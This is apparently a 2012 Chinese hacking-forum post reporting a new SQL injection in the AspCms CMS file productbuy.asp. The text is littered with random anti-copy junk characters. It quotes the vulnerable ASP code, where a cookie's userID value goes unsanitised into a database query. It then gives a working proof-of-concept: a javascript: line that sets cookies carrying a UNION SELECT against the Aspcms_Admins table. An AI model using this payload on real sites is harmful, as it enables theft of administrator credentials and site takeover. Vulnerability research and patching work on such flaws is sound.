好久没上土司了,上来一看发现在删号名单内....." p$ s3 n0 G9 U% p$ a6 `) A
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
/ v) ?9 O a( l废话不多说,看代码:
7 s, F5 {/ q* q* g6 H6 r7 z# V" s2 r; G+ p2 o6 [" w, \4 A
<%* K- i( l. i4 t( Q, k4 ]* L/ B
5 _$ r. i9 N1 [# M, y6 [
if action = "buy" then
- ?! s& H- E; i. E( b, k G
+ @8 f1 C3 F4 b. u: P, D addOrder()
) S7 e* R. Q( B. k- f2 Z
2 l- R( t: u: ~ t$ Z. qelse
+ \) v6 ^) E% w* T- C+ ?: l0 T7 t1 }7 W, G) i
echoContent()
5 [. h( I! X1 w6 b7 [
8 U" h6 R/ h) n" uend if
7 ^) B0 b, t* _1 Q/ d6 P. X) h2 D5 ?9 F Q( y
% I" c) F$ M$ P3 o- ?1 x0 y
+ ]% K1 e( E# {: i……略过/ E, ?( r# ~6 L5 W- ^2 y) [3 z
7 f% r( g; ?8 C+ R: ~% B; D) F
7 Q7 D6 {2 l3 A* e) T
0 ? e+ _: U) h% B0 Y! w( _# f
Sub echoContent()8 e2 ]3 L' t% u# T& P$ U
: p5 n1 a3 E" _4 J( H3 w: }
dim id
- j1 M* h. y2 ^; B& _, p( h+ c
: T \' r4 G/ { id=getForm("id","get"): O% b7 ?3 [3 s: S3 J
0 w4 @# U! M2 \& j$ v' b
; }) c3 R1 F6 d* m- E, v, s# i
9 C1 D1 [3 k" `9 L" [. F: e if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" ' F ]9 x' l, l! p) D6 Q: B
7 S3 y g) n. x6 g# P
1 ~! I. L7 z7 v2 B+ o( W0 A4 n" p2 N, f* C8 L/ t# v) B' {
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")! O8 Y6 M) D! n
' c- S/ Q3 @& b" \7 @ dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
4 w k! u& p) Z8 ]( d; n8 j5 x% G ?* V D8 W" M
Dim templatePath,tempStr+ L* `; i( j: O. X' y9 w
* b+ y' R6 s4 L: v6 O+ Q' p
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"0 k; ~, \. f- [' z) f' h9 b' h
9 `1 n5 Y/ [ m8 \/ ?% P5 u( k1 ^# Y& f( R8 Y
2 g# O) s, Z0 x3 m# e
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
9 u1 q [9 q2 z+ e: F& t+ k
+ k4 f5 Z+ f* R. s& p- {. K selectproduct=rsObj(0)6 S* ]3 |" J) e9 Q
! ]6 R4 u& i9 R8 R6 @6 o
* s! V3 c+ \. N5 \
$ o- @# ]* p" t2 ^* ~. T& V& b Dim linkman,gender,phone,mobile,email,qq,address,postcode4 o0 j5 i9 Q! _: X: @+ h* j
1 E# a$ i% Z& Z/ Q
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",00 K4 I2 P& l! R& d. \' ^& N
- D, n% M( o+ U) M
if rCookie("loginstatus")=1 then ' w; w, Z4 _9 b& n" n9 @/ j
0 ]* i* Y# n1 t- C& S/ ?9 E* v( J+ C set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")# |. f6 y& b2 K3 H3 q- [; e! f& N5 d" g+ u
9 M6 W! e2 D/ E) Z linkman=rsObj("truename")# X$ ~# _! m. I% f
5 u: V- c- b8 `9 v
gender=rsObj("gender") D U# u, O* h2 u V8 ^5 N( k
3 B+ G" O, Q+ L: n
phone=rsObj("phone")
% C' N( L) d+ f9 ~- C
" P+ N. A/ v' \9 _- L' X mobile=rsObj("mobile")- _. G* [4 N8 w' t' v8 B' d
, W' f+ G/ B! P5 e% u6 H
email=rsObj("email")9 q4 V; L. s; ^2 J; V% m3 y; t
9 {+ n2 O: r' |8 x M5 k1 ^
qq=rsObj("qq")4 N) r6 g& t- Y0 M$ T4 B1 U
* m0 z4 @% O$ ]! q' K
address=rsObj("address")) x0 B2 j! G: w) _3 ]
' O1 m$ z4 o. H9 K
postcode=rsObj("postcode")
" O' _, ~/ a% ]6 X+ |/ Y9 G) G6 x0 h% l! y" k- C
else
' X. I# R- c3 ?' m7 \/ j8 [+ q+ }! e0 {6 K& I; y' {+ s
gender=1
: r. T) N, e0 X4 w6 t3 ] K' |; [) K1 [; x5 y7 ^3 h* O% | @6 r
end if# A- F3 X" h5 q5 L3 `1 o
+ k' D9 e6 B8 V- g) T rsObj.close()
) c/ @, I2 b+ @, r! k; U+ r, x1 g" p P
. Y1 f# h% K. t0 {8 R6 r# Q) j ]: E$ e/ o- z' X" S
with templateObj
2 l' d5 |/ E' R0 y# T7 h3 m! U7 @" M$ `* D' s5 ]+ O
.content=loadFile(templatePath) 8 d9 m! E. b2 T/ l% s
6 \+ n v( A, e. S7 D .parseHtml()
& }% }' S9 { Q* y7 a# Z/ X$ S+ w+ W' a9 i
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)" R' B& [* M$ w) Y+ {! D
6 F" O4 q& t# i- q; ~* v" | .content=replaceStr(.content,"[aspcms:linkman]",linkman) ) T) b" s9 t6 T2 Y$ C
( j( b1 b- ^0 n$ I7 A5 w
.content=replaceStr(.content,"[aspcms:gender]",gender)
; p: I( r, @4 z" I
" z, ~; ~# ~; \ .content=replaceStr(.content,"[aspcms:phone]",phone)
' p! L# h( y, W9 M
$ e$ [* A+ J/ ^, z; p2 ? .content=replaceStr(.content,"[aspcms:mobile]",mobile)
5 O( v4 g) D* p
, k4 j& r7 r& s+ O .content=replaceStr(.content,"[aspcms:email]",email) 9 q1 Q! b5 l; t7 t
( F! [! u, @) P8 F' s0 `1 u
.content=replaceStr(.content,"[aspcms:qq]",qq)
4 O# @" _9 m# g. K+ m; {' Q7 v/ G% S* u$ p0 V! F$ e
.content=replaceStr(.content,"[aspcms:address]",address)
; @* K0 B% E+ T% A' {
' d8 ]2 q; Y @+ l4 J .content=replaceStr(.content,"[aspcms:postcode]",postcode)
. L& d. Y: s( g5 h" d- L7 g7 u& E2 h4 V5 j$ C) j1 @% O- k8 g' \7 D
.parseCommon() # q( c; O. E3 s: r1 S( f# S
# o8 E4 R$ I# c" B- w8 h
echo .content
1 c9 `$ e: I) j% t! P9 T5 S
) G3 k( ?. P9 C: z B8 `: C) A, T end with
/ x; F9 H. ]1 b0 B7 _* ]( ?: W2 z1 F j/ _: N
set templateobj =nothing : terminateAllObjects
- ~ e( C* R+ t! e( k7 Q6 ]: \
; H: u6 o6 k, BEnd Sub
6 x- B3 j4 g8 s1 \6 Y漏洞很明显,没啥好说的
y4 O% J& U6 w) u7 q) l! ?poc:
3 c$ m$ n( @ d- H: h% ^* t& d) D% F8 K- u
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
" m5 P! n6 M. p5 m# _: W7 b. s$ C5 K) O+ [# W% b0 |
|
发表于 2012-12-27 08:35:05
收藏
支持
反对